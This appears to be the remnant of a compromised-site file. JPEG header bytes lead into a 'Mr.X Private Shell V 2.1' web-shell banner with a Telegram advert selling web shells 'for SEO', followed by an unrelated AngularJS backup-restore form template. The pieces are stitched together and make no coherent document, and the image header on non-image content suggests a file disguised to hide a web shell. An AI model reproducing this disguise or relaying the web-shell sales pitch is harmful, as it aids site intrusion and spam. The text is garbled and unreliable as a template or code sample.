����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="form-group">
<p ng-hide="config.restore_conditions">{{ lang.t("Are you sure you want to restore from this backup?") }}</p>
<div ng-show="config.restore_conditions">
<div ng-repeat="condition in config.restore_conditions track by $index" id="condition_row_{{$index}}" ng-show="condition.type == 0 || condition.type == backup_type" style="margin-bottom: 5px;">
<label><input type="checkbox" ng-model="condition.checked" /> <strong>{{ condition.title }}</strong></label>
<br><span ng-bind-html="condition.content"></span>
</div>
</div>
</div>
<div class="form-group">
<button
id="backup_table_restore_confirm_{{$index}}"
type="submit"
class="btn btn-primary"
ng-disabled="isConditionsAgreed()"
ng-click="onClickRestoreConfirm()">{{ lang.t("Restore") }}</button>
<button class="btn btn-link" ng-click="cancelAction()" ng-class="{ 'hide': restoringBackup }">{{ lang.t("Cancel") }}</button>
</div>
<div id="restore_backup_status_{{index}}"></div>